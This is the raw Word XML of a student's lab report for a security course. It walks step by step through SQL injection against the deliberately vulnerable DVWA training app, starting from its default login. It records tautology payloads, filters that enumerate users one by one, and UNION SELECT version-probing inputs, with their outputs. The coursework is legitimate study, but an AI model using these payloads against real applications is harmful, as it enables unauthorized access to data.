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C90C4" w14:textId="2686D1CE" w:rsidR="00196016" w:rsidRPr="00F05170" w:rsidRDefault="007B36FD" w:rsidP="00F05170">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto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Jakub Olsovsky</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2B87A2" w14:textId="1FF44FB3" w:rsidR="007B36FD" w:rsidRDefault="007B36FD" w:rsidP="00F05170">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto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Assignment 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA239E0" w14:textId="7422C4DC" w:rsidR="00163D85" w:rsidRPr="00F05170" w:rsidRDefault="00163D85" w:rsidP="00F05170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Professor </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Yantorno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="77093BCE" w14:textId="77777777" w:rsidR="00201662" w:rsidRPr="00F05170" w:rsidRDefault="007B36FD" w:rsidP="00F05170">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto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CS298-71</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565ACC32" w14:textId="1C700B83" w:rsidR="007B36FD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pict w14:anchorId="1FBACB19">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7618A016" w14:textId="77777777" w:rsidR="00163D85" w:rsidRPr="00163D85" w:rsidRDefault="00F05170" w:rsidP="00163D85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163D85">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 1</w:t>
      </w:r>
      <w:r w:rsidR="007B36FD" w:rsidRPr="00163D85">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="005C3370" w:rsidRPr="00163D85">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A6A61C" w14:textId="23119F4A" w:rsidR="007B36FD" w:rsidRPr="00F05170" w:rsidRDefault="007B36FD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Enter the IP address into the URL search bar to connect to Damn Vulnerability Web Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751A7C15" w14:textId="456EAF79" w:rsidR="007B36FD" w:rsidRPr="00F05170" w:rsidRDefault="007B36FD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3A314A66" wp14:editId="02891D5E">
            <wp:extent cx="5943600" cy="512826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3F3C" w14:textId="77777777" w:rsidR="00163D85" w:rsidRDefault="00163D85" w:rsidP="00163D85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6746996E" w14:textId="61FF4BAE" w:rsidR="007B36FD" w:rsidRPr="00163D85" w:rsidRDefault="007B36FD" w:rsidP="00163D85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163D85">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00163D85" w:rsidRPr="00163D85">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tep 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00163D85">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424E9A09" w14:textId="6A6B20EB" w:rsidR="007B36FD" w:rsidRPr="00F05170" w:rsidRDefault="007B36FD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Username: admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26770E04" w14:textId="74E7218E" w:rsidR="005C3370" w:rsidRPr="00F05170" w:rsidRDefault="007B36FD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Password: password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104C61B5" w14:textId="71E188AE" w:rsidR="00163D85" w:rsidRPr="00163D85" w:rsidRDefault="007B36FD" w:rsidP="00163D85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163D85">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B672E5" w14:textId="08FDEBD1" w:rsidR="007B36FD" w:rsidRPr="00F05170" w:rsidRDefault="007B36FD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 Change DVWA </w:t>
      </w:r>
      <w:r w:rsidR="005C3370" w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ecurity </w:t>
      </w:r>
      <w:r w:rsidR="005C3370" w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>evel</w:t>
      </w:r>
      <w:r w:rsidR="005C3370" w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> status</w:t>
      </w:r>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="005C3370" w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>low</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E58AC62" w14:textId="7DA958DF" w:rsidR="007B36FD" w:rsidRPr="00F05170" w:rsidRDefault="007B36FD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7F5AF3B3" wp14:editId="5F440613">
            <wp:extent cx="2486372" cy="876422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690E" w14:textId="4D3C5363" w:rsidR="007B36FD" w:rsidRPr="00F05170" w:rsidRDefault="005C3370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1E57DF0C" wp14:editId="2C14A049">
            <wp:extent cx="1771897" cy="771633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DEC7" w14:textId="77777777" w:rsidR="00163D85" w:rsidRPr="00163D85" w:rsidRDefault="007B36FD" w:rsidP="00163D85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163D85">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5168D5C6" w14:textId="29C273C4" w:rsidR="005C3370" w:rsidRPr="00F05170" w:rsidRDefault="007B36FD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Select the SQL Injection</w:t>
      </w:r>
      <w:r w:rsidR="005C3370" w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> under the site’s navigation options on the left-hand side of the screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD20D0E" w14:textId="77777777" w:rsidR="00163D85" w:rsidRPr="00163D85" w:rsidRDefault="005C3370" w:rsidP="00163D85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163D85">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A3A974" w14:textId="77777777" w:rsidR="00163D85" w:rsidRDefault="005C3370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 Enter query values </w:t>
      </w:r>
      <w:r w:rsidR="0070134E" w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">for specific </w:t>
      </w:r>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidR="0070134E" w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0070134E" w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>into the user id input field</w:t>
      </w:r>
      <w:r w:rsidR="00201662" w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for testing</w:t>
      </w:r>
      <w:r w:rsidR="00163D85">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C926735" w14:textId="7E75B4BD" w:rsidR="00163D85" w:rsidRDefault="005C3370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Input:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F05B97D" w14:textId="65F25421" w:rsidR="005C3370" w:rsidRPr="00F05170" w:rsidRDefault="005C3370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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1695E781" w14:textId="3413E3B7" w:rsidR="005C3370" w:rsidRPr="00F05170" w:rsidRDefault="005C3370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1C1BB2D9" w14:textId="7A13C482" w:rsidR="005C3370" w:rsidRPr="00F05170" w:rsidRDefault="005C3370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0AF5E61D" wp14:editId="1689A999">
            <wp:extent cx="2267266" cy="819264"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="Picture 5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CC36" w14:textId="77777777" w:rsidR="00163D85" w:rsidRDefault="005C3370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Input:</w:t>
      </w:r>
      <w:r w:rsidR="0070134E" w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6366B80B" w14:textId="378E2157" w:rsidR="005C3370" w:rsidRPr="00F05170" w:rsidRDefault="0070134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3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BB8D5A" w14:textId="565E079B" w:rsidR="0070134E" w:rsidRPr="00F05170" w:rsidRDefault="0070134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lastRenderedPageBreak/>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70569ACD" w14:textId="213889CA" w:rsidR="0070134E" w:rsidRPr="00F05170" w:rsidRDefault="0070134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110ACC8C" wp14:editId="6655D93E">
            <wp:extent cx="2010056" cy="809738"/>
            <wp:effectExtent l="0" t="0" r="9525" b="952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0D1A" w14:textId="4F675C4C" w:rsidR="0070134E" w:rsidRPr="00163D85" w:rsidRDefault="0070134E" w:rsidP="00163D85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163D85">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 6:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B5DCC3" w14:textId="63640119" w:rsidR="0070134E" w:rsidRPr="00F05170" w:rsidRDefault="0070134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  <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>w' OR '1' = '1</w:t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>Input: ' OR '' = '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539E70DC" w14:textId="091C47FD" w:rsidR="0070134E" w:rsidRPr="00F05170" w:rsidRDefault="0070134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</w:r>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132FA4BB" w14:textId="580D46F0" w:rsidR="0070134E" w:rsidRPr="00F05170" w:rsidRDefault="0070134E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72BA8236" wp14:editId="782246E0">
            <wp:extent cx="2276793" cy="4201111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170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36273E15" wp14:editId="1A858B51">
            <wp:extent cx="2362530" cy="4172532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147A" w14:textId="28F874C3" w:rsidR="0070134E" w:rsidRPr="00F05170" w:rsidRDefault="0070134E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Step 7: Bugged</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283CBCE2" w14:textId="77777777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</w:p>
    <w:p w14:paraId="196AED48" w14:textId="77777777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</w:p>
    <w:p w14:paraId="7D073EF6" w14:textId="77777777" w:rsidR="00163D85" w:rsidRDefault="00163D85" w:rsidP="00163D85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EA41629" w14:textId="15A8851C" w:rsidR="0070134E" w:rsidRPr="00163D85" w:rsidRDefault="0070134E" w:rsidP="00163D85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00163D85">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 8:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2838ED26" w14:textId="77777777" w:rsidR="00163D85" w:rsidRDefault="0070134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Input:</w:t>
      </w:r>
      <w:r w:rsidR="00150168" w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C643C9" w14:textId="1A0761A0" w:rsidR="0070134E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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>w' OR '1' = '1' AND first_name &lt;&gt; 'admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6319F3B6" w14:textId="10674F70" w:rsidR="0070134E" w:rsidRPr="00F05170" w:rsidRDefault="0070134E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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB9D6A6" w14:textId="7BEB849C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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36B4E0F4" wp14:editId="45D75705">
            <wp:extent cx="3844400" cy="2468880"/>
            <wp:effectExtent l="0" t="0" r="381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514" cy="24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8213" w14:textId="77777777" w:rsidR="00163D85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Input:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABC8720" w14:textId="1BA2C781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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>w' OR '1' = '1' AND first_name &lt;&gt; 'admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AND first_name &lt;&gt; 'Gordon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306A1639" w14:textId="0986C962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Output:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26BB5346" wp14:editId="4A592E5E">
            <wp:extent cx="5202936" cy="1554210"/>
            <wp:effectExtent l="0" t="0" r="0" b="825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310" cy="15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2066" w14:textId="77777777" w:rsidR="00163D85" w:rsidRDefault="00150168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Input:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB98055" w14:textId="4ECC66F8" w:rsidR="00150168" w:rsidRPr="00F05170" w:rsidRDefault="00150168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w' OR '1' = '1' AND first_name &lt;&gt; 'admin' AND first_name &lt;&gt; 'Gordon'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6928F2B4" w14:textId="267D2615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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>and first_name &lt;&gt; 'Hack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2615E96D" w14:textId="77777777" w:rsidR="00163D85" w:rsidRDefault="00163D85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</w:p>
    <w:p w14:paraId="62F3C28C" w14:textId="4AC29689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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF1731A" w14:textId="0D91AEE6" w:rsidR="00150168" w:rsidRPr="00F05170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28EF744A" wp14:editId="6844F422">
            <wp:extent cx="5943600" cy="887730"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="12" name="Picture 12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, company nam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7A09" w14:textId="77777777" w:rsidR="00163D85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Input:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E568BC2" w14:textId="31A8C467" w:rsidR="00150168" w:rsidRPr="00F05170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w' OR '1' = '1' AND first_name &lt;&gt; 'admin' AND first_name &lt;&gt; 'Gordon'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56914426" w14:textId="093C8C70" w:rsidR="00150168" w:rsidRPr="00F05170" w:rsidRDefault="00150168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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>and first_name &lt;&gt; 'Hack' AND first_name &lt;&gt; 'Pablo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF04411" w14:textId="665F44E4" w:rsidR="00150168" w:rsidRPr="00F05170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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D14FC89" w14:textId="3937E64C" w:rsidR="00150168" w:rsidRPr="00F05170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2865FC0D" wp14:editId="7741FA9A">
            <wp:extent cx="5943600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D665" w14:textId="77777777" w:rsidR="00163D85" w:rsidRDefault="00150168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</w:p>
    <w:p w14:paraId="568EAFB6" w14:textId="78ED8435" w:rsidR="00150168" w:rsidRPr="00F05170" w:rsidRDefault="00150168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w' OR '1' = '1' AND first_name &lt;&gt; 'admin' AND first_name &lt;&gt; 'Gordon'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308AD14B" w14:textId="4F61E718" w:rsidR="00150168" w:rsidRPr="00F05170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and first_name &lt;&gt; 'Hack' AND first_name &lt;&gt; 'Pablo' AND first_name &lt;&gt; 'Bob</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B1DEFF" w14:textId="77777777" w:rsidR="00163D85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Output: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FD96B9" w14:textId="0CE53869" w:rsidR="00150168" w:rsidRPr="00F05170" w:rsidRDefault="00150168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Nothing was returned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B88A92B" w14:textId="6FE2CA6C" w:rsidR="00AB745E" w:rsidRPr="00163D85" w:rsidRDefault="00150168" w:rsidP="00163D85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00163D85">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 9:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCC04E8" w14:textId="77777777" w:rsidR="00163D85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Input:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAC8778" w14:textId="55A6670B" w:rsidR="00AB745E" w:rsidRPr="00F05170" w:rsidRDefault="00AB745E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' SELECT VERSION()#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C735713" w14:textId="04B2A4D5" w:rsidR="00AB745E" w:rsidRPr="00F05170" w:rsidRDefault="00AB745E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noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Output: Error message states “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntac to use near “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>' SELECT VERSION()#</w:t>
      </w:r>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">”at line 1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Which was expected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4377609D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27902784" w14:textId="447123CE" w:rsidR="00163D85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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Input: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76190C1D" w14:textId="370074DE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' UNION SELECT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>VERSION(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C878D6" w14:textId="0244B95C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Output: Error message states </w:t>
      </w:r>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“The used SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>statements have a different number of columns.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D63D74" w14:textId="77777777" w:rsidR="00163D85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</w:p>
    <w:p w14:paraId="5FF250A2" w14:textId="494EF9E9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' UNION SELECT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>VERSION(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>), NULL#</w:t>
      </w:r>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Proper syntax with column value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FB84FB" w14:textId="0454475D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30427229" w14:textId="2D32A1BF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6DB2AC41" wp14:editId="7A87220F">
            <wp:extent cx="4305901" cy="876422"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16" name="Picture 16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ompany n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6E81" w14:textId="77777777" w:rsidR="00163D85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Input:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A73DF73" w14:textId="7445624F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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT NULL, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>VERSION(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D06A3C" w14:textId="3F541A7A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18888EFE" w14:textId="7B6C4ABA" w:rsidR="00AB745E" w:rsidRPr="00F05170" w:rsidRDefault="00AB745E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340BFEF9" wp14:editId="4B415566">
            <wp:extent cx="4429743" cy="819264"/>
            <wp:effectExtent l="0" t="0" r="9525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BDBB" w14:textId="693CC6AC" w:rsidR="00201662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  <w:r w:rsidRPr="00F05170">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>' UNION SELECT @@version, NULL#</w:t>
      </w:r>
    </w:p>
